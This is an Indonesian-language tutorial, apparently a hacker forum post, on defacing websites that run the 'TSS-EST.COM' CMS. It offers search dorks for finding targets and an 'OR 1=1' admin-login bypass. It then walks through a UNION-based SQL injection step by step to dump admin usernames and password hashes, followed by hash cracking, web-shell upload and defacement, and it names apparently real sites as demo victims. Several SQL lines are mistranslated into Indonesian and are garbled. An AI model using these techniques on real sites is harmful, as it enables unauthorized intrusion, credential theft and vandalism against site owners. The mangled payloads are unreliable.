Banyak Yang Bertanya ? kok di ujung Poc itu ada Multiple Exploits. Karena Poc Ini Bisa Menggunakan Dua Bug / exploit
Yang Pertama Adalah Admin Bypass Dan Yang Kedua Adalah SQLI
Sudah Gak Perlu Basa Basi Nanti Gak Jadi Defacenya :D
Siapkan Alat Deface Untuk Bug Bypass Admin
============================
Dork1 : "Powered by: TSS-EST.COM" [Kembangin Sendiri Ya]
Dork 2 : "Powered by TSS-EST.COM"
Exploit: http.www[target].com/CMS
CMS itu Tempat Admin Login nya
Jangan Lupa Siapkan Shell Untuk Upload Scrip Deface
============================
Langsung Kita Mulai Saja Bug Yang Pertama Yaitu Admin Bypaas
Yang Pertama Adalah Kita Dorking Dulu :D
Setelah Itu Kita Buka Web Satu per satu dan Jangan Lupa Di Belakang Nya Di Kasi Exploit Seperti Ini Jika Berhasil Maka Akan Muncul Administrasi Login nya, Seperti ini :
Sekarang Kalian Isi Dengan ini
Username : ADMIN' OR 1=1#
Password : ADMIN' OR 1=1#
Jika Berhasil Kalian Akan Di bawa Ke Menu Adminsitrasi nya Dan Kalian Tinggal Upload shell Deh :D
Kalau Gak Bisa Upload Shell Kalian Cek Di Sini Klik
===============================Langsung Saja Kita Menggunakan Bug Ke 2 Yaitu Sqli Bug Sqli Menggunakan Dork Yang Sama Seperti Di atas Tetapi Kita Bisa Kembangin Sendiri
#1 Contoh
Dork SQLI : "Powered by TSS-EST.COM" =
"Powered by TSS-EST.COM"?=
KEMBANGIN LAH
#2 Membuka situs web apapun
seperti ==> www.target.com/index.php?id=1
#3 Sekarang Anda harus menambahkan (') pada akhir URL
seperti ==> www.target.com/index.php?id=1 '
jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql. Bisa Juga Berbahas Inggris Yah :D
#4 Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
#5 Sekarang kita harus menemukan kolom rentan
serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
#6 kita harus menemukan versi database
www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
#7 Sekarang menemukan nama database
serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"
#8 Sekarang menemukan nama semua tabel
union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -
ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel
biarkan kita menemukan nama tabel "administrator"
#9 Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
#10 Sekarang menemukan password dari user_name
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
ia akan menampilkan username dan password
ia akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi
untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk
Setelah itu Tinggal Cari Admin Loginnya Biasanya Admin Login nya Berada di
http://www.[target]cms
Demo Bypaas Admin : http://www.grccreation.com/ #No Error
Demo Sqli injection :
http://www.alhasnaacoffee.com/index.php?ACT=2&Cid=11'' #ERROR
SEMOGA BERMANFAT